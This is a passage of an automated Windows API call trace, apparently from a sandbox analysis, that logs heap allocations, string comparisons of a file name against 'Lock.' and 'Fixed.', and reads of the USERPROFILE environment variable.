lpString2="Lock.", cchCount2=5) returned 3 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YHa.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ha.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0198.287] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0198.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0198.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0198.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0198.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0198.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0198.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="enrHxcENdtYHa.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nrHxcENdtYHa.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rHxcENdtYHa.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HxcENdtYHa.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xcENdtYHa.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cENdtYHa.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ENdtYHa.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NdtYHa.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dtYHa.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tYHa.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YHa.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ha.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0198.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b36c0 [0198.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0198.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0198.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0198.289] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0198.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0198.289] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0198.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0198.290] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0198.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0198.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.291] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0198.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0198.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0198.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0198.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0198.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0198.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0198.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b3020 [0198.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0198.292] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0198.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0198.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0198.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0198.293] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0198.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0198.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0198.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0198.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0198.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0198.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0198.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x24b3020 [0198.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1908 [0198.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18d8 [0198.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0198.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0198.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0198.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0198.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0198.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0198.296] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0198.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0198.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0198.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.297] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0198.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0198.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0198.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.297] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.297] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0198.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0198.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0198.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0198.298] 